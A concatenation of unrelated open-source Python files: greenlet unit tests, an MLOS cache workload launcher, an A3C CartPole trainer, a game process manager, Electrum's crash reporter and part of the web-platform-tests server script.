current = greenlet.getcurrent()
g = garbage()
for _ in x:
g = None # lose reference to garbage
if recycled[0]:
# gc callback called prematurely
t.join()
return False
last = greenlet()
if recycled[0]:
break # yes! gc called in green_new
l.append(last) # increase allocation counter
else:
# gc callback not called when expected
gc.collect()
if recycled[0]:
t.join()
return False
self.assertEqual(last.parent, current)
for g in l:
self.assertEqual(g.parent, current)
return True
for _ in range(5):
if attempt():
break
def test_issue_245_reference_counting_subclass_no_threads(self):
# https://github.com/python-greenlet/greenlet/issues/245
# Before the fix, this crashed pretty reliably on
# Python 3.10, at least on macOS; but much less reliably on other
# interpreters (memory layout must have changed).
# The threaded test crashed more reliably on more interpreters.
from greenlet import getcurrent
from greenlet import GreenletExit
class Greenlet(greenlet):
pass
initial_refs = sys.getrefcount(Greenlet)
# This has to be an instance variable because
# Python 2 raises a SyntaxError if we delete a local
# variable referenced in an inner scope.
self.glets = [] # pylint:disable=attribute-defined-outside-init
def greenlet_main():
try:
getcurrent().parent.switch()
except GreenletExit:
self.glets.append(getcurrent())
        # Before the fix, each of the greenlets created below leaked a
        # reference to the Greenlet subclass.
for _ in range(10):
Greenlet(greenlet_main).switch()
del self.glets
self.assertEqual(sys.getrefcount(Greenlet), initial_refs)
def test_issue_245_reference_counting_subclass_threads(self):
# https://github.com/python-greenlet/greenlet/issues/245
from threading import Thread
from threading import Event
from greenlet import getcurrent
class MyGreenlet(greenlet):
pass
glets = []
ref_cleared = Event()
def greenlet_main():
getcurrent().parent.switch()
def thread_main(greenlet_running_event):
mine = MyGreenlet(greenlet_main)
glets.append(mine)
# The greenlets being deleted must be active
mine.switch()
# Don't keep any reference to it in this thread
del mine
# Let main know we published our greenlet.
greenlet_running_event.set()
# Wait for main to let us know the references are
# gone and the greenlet objects no longer reachable
ref_cleared.wait()
# The creating thread must call getcurrent() (or a few other
# greenlet APIs) because that's when the thread-local list of dead
# greenlets gets cleared.
getcurrent()
# We start with 3 references to the subclass:
# - This module
# - Its __mro__
        # - The __subclasses__ attribute of greenlet
# - (If we call gc.get_referents(), we find four entries, including
# some other tuple ``(greenlet)`` that I'm not sure about but must be part
# of the machinery.)
#
# On Python 3.10 it's often enough to just run 3 threads; on Python 2.7,
# more threads are needed, and the results are still
# non-deterministic. Presumably the memory layouts are different
initial_refs = sys.getrefcount(MyGreenlet)
thread_ready_events = []
for _ in range(
initial_refs + 45
):
event = Event()
thread = Thread(target=thread_main, args=(event,))
thread_ready_events.append(event)
thread.start()
for done_event in thread_ready_events:
done_event.wait()
del glets[:]
ref_cleared.set()
# Let any other thread run; it will crash the interpreter
# if not fixed (or silently corrupt memory and we possibly crash
# later).
time.sleep(1)
self.assertEqual(sys.getrefcount(MyGreenlet), initial_refs)
class TestRepr(unittest.TestCase):
def assertEndsWith(self, got, suffix):
self.assertTrue(got.endswith(suffix), (got, suffix))
def test_main_while_running(self):
r = repr(greenlet.getcurrent())
self.assertEndsWith(r, " current active started main>")
def test_main_in_background(self):
main = greenlet.getcurrent()
def run():
return repr(main)
g = greenlet(run)
r = g.switch()
self.assertEndsWith(r, ' suspended active started main>')
def test_initial(self):
r = repr(greenlet())
self.assertEndsWith(r, ' pending>')
def test_main_from_other_thread(self):
main = greenlet.getcurrent()
class T(threading.Thread):
original_main = thread_main = None
main_glet = None
def run(self):
self.original_main = repr(main)
self.main_glet = greenlet.getcurrent()
self.thread_main = repr(self.main_glet)
t = T()
t.start()
t.join(10)
self.assertEndsWith(t.original_main, ' suspended active started main>')
self.assertEndsWith(t.thread_main, ' current active started main>')
r = repr(t.main_glet)
# main greenlets, even from dead threads, never really appear dead
# TODO: Can we find a better way to differentiate that?
assert not t.main_glet.dead
self.assertEndsWith(r, ' suspended active started main>')
def test_dead(self):
g = greenlet(lambda: None)
g.switch()
self.assertEndsWith(repr(g), ' dead>')
self.assertNotIn('suspended', repr(g))
self.assertNotIn('started', repr(g))
self.assertNotIn('active', repr(g))
def test_formatting_produces_native_str(self):
# https://github.com/python-greenlet/greenlet/issues/218
# %s formatting on Python 2 was producing unicode, not str.
g_dead = greenlet(lambda: None)
g_not_started = greenlet(lambda: None)
g_cur = greenlet.getcurrent()
for g in g_dead, g_not_started, g_cur:
self.assertIsInstance(
'%s' % (g,),
str
)
self.assertIsInstance(
'%r' % (g,),
str,
)
if __name__ == '__main__':
unittest.main()
|
SmartCacheWorkloadLauncher.py
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
from threading import Thread
from mlos.Examples.SmartCache.SmartCache import SmartCache
from mlos.Examples.SmartCache.SmartCacheWorkloadGenerator import SmartCacheWorkloadGenerator
from mlos.Mlos.SDK import mlos_globals, MlosAgent
class SmartCacheWorkloadLauncher:
"""Prepares the mlos infrastructure and launches SmartCacheWorkload.
Parameters
----------
logger : Logger
Attributes
----------
mlos_agent : MlosAgent
"""
def __init__(self, logger):
mlos_globals.init_mlos_global_context()
self.mlos_agent = MlosAgent(
logger=logger,
communication_channel=mlos_globals.mlos_global_context.communication_channel,
shared_config=mlos_globals.mlos_global_context.shared_config,
)
self._mlos_agent_thread = Thread(target=self.mlos_agent.run)
self._mlos_agent_thread.start()
self.mlos_agent.add_allowed_component_type(SmartCache)
self.mlos_agent.add_allowed_component_type(SmartCacheWorkloadGenerator)
self._smart_cache_workload = SmartCacheWorkloadGenerator(logger=logger)
self._smart_cache_workload_thread = None
def start_workload(self, duration_s=1, block=True):
self._smart_cache_workload_thread = Thread(target=self._smart_cache_workload.run, args=(duration_s,))
self._smart_cache_workload_thread.start()
if block:
self._smart_cache_workload_thread.join()
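# Added usage sketch (assumption: a standard library logger is acceptable
# here; the original module leaves logger construction to the caller):
#
#   import logging
#   launcher = SmartCacheWorkloadLauncher(logger=logging.getLogger(__name__))
#   launcher.start_workload(duration_s=5, block=True)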
|
a3c.py
|
import time
import gym
import torch
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical
# Hyperparameters
n_train_processes = 3
learning_rate = 0.0002
update_interval = 5
gamma = 0.98
max_train_ep = 300
max_test_ep = 400
class ActorCritic(nn.Module):
def __init__(self):
super(ActorCritic, self).__init__()
self.fc1 = nn.Linear(4, 256)
self.fc_pi = nn.Linear(256, 2)
self.fc_v = nn.Linear(256, 1)
def pi(self, x, softmax_dim=0):
x = F.relu(self.fc1(x))
x = self.fc_pi(x)
prob = F.softmax(x, dim=softmax_dim)
return prob
def v(self, x):
x = F.relu(self.fc1(x))
v = self.fc_v(x)
return v
def train(global_model, rank):
local_model = ActorCritic()
local_model.load_state_dict(global_model.state_dict())
optimizer = optim.Adam(global_model.parameters(), lr=learning_rate)
env = gym.make('CartPole-v1')
for n_epi in range(max_train_ep):
done = False
s = env.reset()
while not done:
s_lst, a_lst, r_lst = [], [], []
for t in range(update_interval):
prob = local_model.pi(torch.from_numpy(s).float())
m = Categorical(prob)
a = m.sample().item()
s_prime, r, done, info = env.step(a)
s_lst.append(s)
a_lst.append([a])
r_lst.append(r / 100.0)
s = s_prime
if done:
break
s_final = torch.tensor(s_prime, dtype=torch.float)
R = 0.0 if done else local_model.v(s_final).item()
td_target_lst = []
for reward in r_lst[::-1]:
R = gamma * R + reward
td_target_lst.append([R])
td_target_lst.reverse()
s_batch, a_batch, td_target = torch.tensor(s_lst, dtype=torch.float), torch.tensor(a_lst), \
torch.tensor(td_target_lst)
advantage = td_target - local_model.v(s_batch)
pi = local_model.pi(s_batch, softmax_dim=1)
pi_a = pi.gather(1, a_batch)
loss = -torch.log(pi_a) * advantage.detach() + \
F.smooth_l1_loss(local_model.v(s_batch), td_target.detach())
optimizer.zero_grad()
loss.mean().backward()
for global_param, local_param in zip(global_model.parameters(), local_model.parameters()):
global_param._grad = local_param.grad
optimizer.step()
local_model.load_state_dict(global_model.state_dict())
env.close()
print("Training process {} reached maximum episode.".format(rank))
def test(global_model):
env = gym.make('CartPole-v1')
score = 0.0
print_interval = 20
for n_epi in range(max_test_ep):
done = False
s = env.reset()
while not done:
prob = global_model.pi(torch.from_numpy(s).float())
a = Categorical(prob).sample().item()
s_prime, r, done, info = env.step(a)
s = s_prime
score += r
if n_epi % print_interval == 0 and n_epi != 0:
print("# of episode :{}, avg score : {:.1f}".format(
n_epi, score / print_interval))
score = 0.0
time.sleep(1)
env.close()
if __name__ == '__main__':
global_model = ActorCritic()
global_model.share_memory()
processes = []
for rank in range(n_train_processes + 1): # + 1 for test process
if rank == 0:
p = mp.Process(target=test, args=(global_model,))
else:
p = mp.Process(target=train, args=(global_model, rank,))
p.start()
processes.append(p)
for p in processes:
p.join()
|
main.py
|
import sys
from homescreen import run_all
from homescreen import play_sound
import multiprocessing
import config
from sound_player import play_music1
config.init()
mylist = [False]
def soundmanager(num):
p3 = multiprocessing.Process(target=play_music1)
p3.start()
count = 1
while (True):
if num.value == 1:
p3.terminate()
count -= 1
num.value = 10
if num.value == 0 and count == 0:
p3 = multiprocessing.Process(target=play_music1)
p3.start()
count += 1
num.value = 11
def processManager():
manager = multiprocessing.Manager()
num = manager.Value('i', 2)
finish = manager.Value('i', 0)
p1 = multiprocessing.Process(target=run_all, args=(num, finish,))
p2 = multiprocessing.Process(target=soundmanager, args=(num,))
p1.start()
p2.start()
while (True):
if finish.value == 1:
p1.terminate()
p2.terminate()
sys.exit()
if __name__ == '__main__':
multiprocessing.freeze_support()
processManager()
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://crashhub.electrum-ltc.org"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["29a0", "bfe2"] and ".electrum-ltc.org" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def _get_traceback_str(self) -> str:
return "".join(traceback.format_exception(*self.exc_args))
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
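# Minimal concrete reporter, added purely as an illustration of the two hooks
# subclasses must provide (hypothetical class; Electrum's GUI front-ends ship
# their own implementations):
class _ExampleCrashReporter(BaseCrashReporter):
    def get_user_description(self):
        return "crash reproduced while opening a wallet"  # placeholder text
    def get_wallet_type(self) -> str:
        return "standard"  # placeholder wallet type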
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
    # method will be grouped together by the crash reporter, and thus
    # will not spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
serve.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import os
import re
import socket
import sys
import threading
import time
import traceback
import urllib2
import uuid
from collections import defaultdict, OrderedDict
from multiprocessing import Process, Event
from ..localpaths import repo_root
import sslutils
from manifest.sourcefile import read_script_metadata, js_meta_re
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from mod_pywebsocket import standalone as pywebsocket
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
class WrapperHandler(object):
__meta__ = abc.ABCMeta
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
path = self._get_path(request.url_parts.path, True)
meta = "\n".join(self._get_meta(request))
response.content = self.wrapper % {"meta": meta, "path": path}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
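    # Added illustration (using the WorkersHandler mapping defined below, where
    # path_replace contains (".any.worker.html", ".any.js", ".any.worker.js")):
    #   _get_path("/a/b.any.worker.html", resource_path=True)  -> "/a/b.any.worker.js"
    #   _get_path("/a/b.any.worker.html", resource_path=False) -> "/a/b.any.js"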
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on //META comments in the associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
class HtmlWrapperHandler(WrapperHandler):
def _meta_replacement(self, key, value):
if key == b"timeout":
if value == b"long":
return '<meta name="timeout" content="long">'
if key == b"script":
            attribute = value.decode('utf-8').replace('"', "&quot;").replace(">", "&gt;")
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyWorkerHandler(WrapperHandler):
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
if key == b"timeout":
return None
if key == b"script":
attribute = value.decode('utf-8').replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
subdomains = [u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/serve.py", handlers.ErrorHandler(404))]
self.static = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.static
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_static(self, path, format_args, content_type, route):
handler = handlers.StaticHandler(path, format_args, content_type)
self.static.append((b"GET", str(route), handler))
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
b"%s%s" % (str(url_base) if url_base != "/" else "", str(suffix)),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def build_routes(aliases):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder.get_routes()
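# Illustrative sketch (not part of the original module): the shape of the
# "aliases" entries consumed by build_routes(); both local-dir values below
# are hypothetical. A trailing "/" in "url-path" mounts a whole directory,
# anything else serves a single file. Never called here.
def _example_build_routes():
    aliases = [
        {"url-path": "/fonts/", "local-dir": "third_party/fonts"},
        {"url-path": "/favicon.ico", "local-dir": "resources/favicon.ico"},
    ]
    return build_routes(aliases)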
def setup_logger(level):
import logging
global logger
logger = logging.getLogger("web-platform-tests")
logging.basicConfig(level=getattr(logging, level.upper()))
set_logger(logger)
def open_socket(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if port != 0:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', port))
sock.listen(5)
return sock
def bad_port(port):
"""
Bad port as per https://fetch.spec.whatwg.org/#port-blocking
"""
return port in [
1, # tcpmux
7, # echo
9, # discard
11, # systat
13, # daytime
15, # netstat
17, # qotd
19, # chargen
20, # ftp-data
21, # ftp
22, # ssh
23, # telnet
25, # smtp
37, # time
42, # name
43, # nicname
53, # domain
77, # priv-rjs
79, # finger
87, # ttylink
95, # supdup
101, # hostriame
102, # iso-tsap
103, # gppitnp
104, # acr-nema
109, # pop2
110, # pop3
111, # sunrpc
113, # auth
115, # sftp
117, # uucp-path
119, # nntp
123, # ntp
135, # loc-srv / epmap
139, # netbios
143, # imap2
179, # bgp
389, # ldap
465, # smtp+ssl
512, # print / exec
513, # login
514, # shell
515, # printer
526, # tempo
530, # courier
531, # chat
532, # netnews
540, # uucp
556, # remotefs
563, # nntp+ssl
587, # smtp
601, # syslog-conn
636, # ldap+ssl
993, # imap+ssl
995, # pop3+ssl
2049, # nfs
3659, # apple-sasl
4045, # lockd
6000, # x11
6665, # irc (alternate)
6666, # irc (alternate)
6667, # irc (default)
6668, # irc (alternate)
6669, # irc (alternate)
]
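# For example, bad_port(6667) is True (default IRC port) while bad_port(8000)
# is False, so get_port() below keeps drawing OS-assigned ports until it gets
# one that is not on the block list.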
def get_port():
port = 0
while True:
free_socket = open_socket(0)
port = free_socket.getsockname()[1]
free_socket.close()
if not bad_port(port):
break
logger.debug("Going to use port %s" % port)
return port
class ServerProc(object):
def __init__(self):
self.proc = None
self.daemon = None
self.stop = Event()
def start(self, init_func, host, port, paths, routes, bind_hostname, external_config,
ssl_config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_hostname,
external_config, ssl_config),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_hostname,
external_config, ssl_config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_hostname, external_config,
ssl_config, **kwargs)
except socket.error:
print("Socket error on port %s" % port, file=sys.stderr)
raise
except:
print(traceback.format_exc(), file=sys.stderr)
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(host, paths, bind_hostname, ssl_config, aliases):
port = get_port()
subdomains = get_subdomains(host)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, build_routes(aliases), bind_hostname,
None, ssl_config)
connected = False
for i in range(10):
try:
urllib2.urlopen("http://%s:%d/" % (host, port))
connected = True
break
except urllib2.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server on http://%s:%s You may need to edit /etc/hosts or similar" % (host, port))
sys.exit(1)
for subdomain, (punycode, host) in subdomains.iteritems():
domain = "%s.%s" % (punycode, host)
try:
urllib2.urlopen("http://%s:%d/" % (domain, port))
except Exception as e:
logger.critical("Failed probing domain %s. You may need to edit /etc/hosts or similar." % domain)
sys.exit(1)
wrapper.wait()
def get_subdomains(host):
#This assumes that the tld is ascii-only or already in punycode
return {subdomain: (subdomain.encode("idna"), host)
for subdomain in subdomains}
def start_servers(host, ports, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
servers = defaultdict(list)
for scheme, ports in ports.iteritems():
assert len(ports) == {"http":2}.get(scheme, 1)
for port in ports:
if port is None:
continue
init_func = {"http":start_http_server,
"https":start_https_server,
"ws":start_ws_server,
"wss":start_wss_server}[scheme]
server_proc = ServerProc()
server_proc.start(init_func, host, port, paths, routes, bind_hostname,
external_config, ssl_config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def start_http_server(host, port, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_hostname=bind_hostname,
config=external_config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
def start_https_server(host, port, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_hostname=bind_hostname,
config=external_config,
use_ssl=True,
key_file=ssl_config["key_path"],
certificate=ssl_config["cert_path"],
encrypt_after_connect=ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, log_level, bind_hostname,
ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root,
"--log-level", log_level]
if ssl_config is not None:
# This is usually done through pywebsocket.main, however we're
# working around that to get the server instance and manually
# setup the wss server.
if pywebsocket._import_ssl():
tls_module = pywebsocket._TLS_BY_STANDARD_MODULE
elif pywebsocket._import_pyopenssl():
tls_module = pywebsocket._TLS_BY_PYOPENSSL
else:
print("No SSL module available")
sys.exit(1)
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"],
"--tls-module", tls_module]
        if bind_hostname:
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def start_ws_server(host, port, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
return WebSocketDaemon(host,
str(port),
repo_root,
paths["ws_doc_root"],
"debug",
bind_hostname,
                           ssl_config=None)
def start_wss_server(host, port, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
return WebSocketDaemon(host,
str(port),
repo_root,
paths["ws_doc_root"],
"debug",
bind_hostname,
ssl_config)
def get_ports(config, ssl_environment):
rv = defaultdict(list)
for scheme, ports in config["ports"].iteritems():
for i, port in enumerate(ports):
if scheme in ["wss", "https"] and not ssl_environment.ssl_enabled:
port = None
if port == "auto":
port = get_port()
else:
port = port
rv[scheme].append(port)
return rv
def normalise_config(config, ports):
host = config["external_host"] if config["external_host"] else config["host"]
domains = get_subdomains(host)
ports_ = {}
for scheme, ports_used in ports.iteritems():
ports_[scheme] = ports_used
for key, value in domains.iteritems():
domains[key] = ".".join(value)
domains[""] = host
ports_ = {}
for scheme, ports_used in ports.iteritems():
ports_[scheme] = ports_used
return {"host": host,
"domains": domains,
"ports": ports_}
def get_ssl_config(config, external_domains, ssl_environment):
key_path, cert_path = ssl_environment.host_cert_path(external_domains)
return {"key_path": key_path,
"cert_path": cert_path,
"encrypt_after_connect": config["ssl"]["encrypt_after_connect"]}
def start(config, ssl_environment, routes, **kwargs):
host = config["host"]
domains = get_subdomains(host)
ports = get_ports(config, ssl_environment)
bind_hostname = config["bind_hostname"]
paths = {"doc_root": config["doc_root"],
"ws_doc_root": config["ws_doc_root"]}
external_config = normalise_config(config, ports)
ssl_config = get_ssl_config(config, external_config["domains"].values(), ssl_environment)
if config["check_subdomains"]:
check_subdomains(host, paths, bind_hostname, ssl_config, config["aliases"])
servers = start_servers(host, ports, paths, routes, bind_hostname, external_config,
ssl_config, **kwargs)
return external_config, servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
def value_set(config, key):
return key in config and config[key] is not None
def get_value_or_default(config, key, default=None):
return config[key] if value_set(config, key) else default
def set_computed_defaults(config):
if not value_set(config, "doc_root"):
config["doc_root"] = repo_root
if not value_set(config, "ws_doc_root"):
root = get_value_or_default(config, "doc_root", default=repo_root)
config["ws_doc_root"] = os.path.join(root, "websockets", "handlers")
if not value_set(config, "aliases"):
config["aliases"] = []
def merge_json(base_obj, override_obj):
rv = {}
for key, value in base_obj.iteritems():
if key not in override_obj:
rv[key] = value
else:
if isinstance(value, dict):
rv[key] = merge_json(value, override_obj[key])
